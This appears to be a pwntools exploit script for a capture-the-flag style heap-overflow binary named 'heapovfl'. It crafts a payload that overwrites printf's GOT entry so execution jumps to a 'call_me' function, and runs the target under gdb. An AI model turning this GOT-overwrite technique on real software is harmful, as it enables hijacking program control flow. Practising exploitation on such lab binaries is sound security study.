from pwn import *
e = ELF("heapovfl")

printf_got = e.symbols['got.printf']
printf_plt = e.symbols['plt.printf']
call_me = e.symbols['call_me']

target = printf_got
payload = b"AAAABBBBCCCCDDDDEEEE" + p32(target)

context.terminal = ["tmux", "splitw", "-h"]

_args = [e.path, payload, p32(call_me)]

gcmds = """
b *main
continue
"""
o = gdb.debug(_args, gdbscript=gcmds)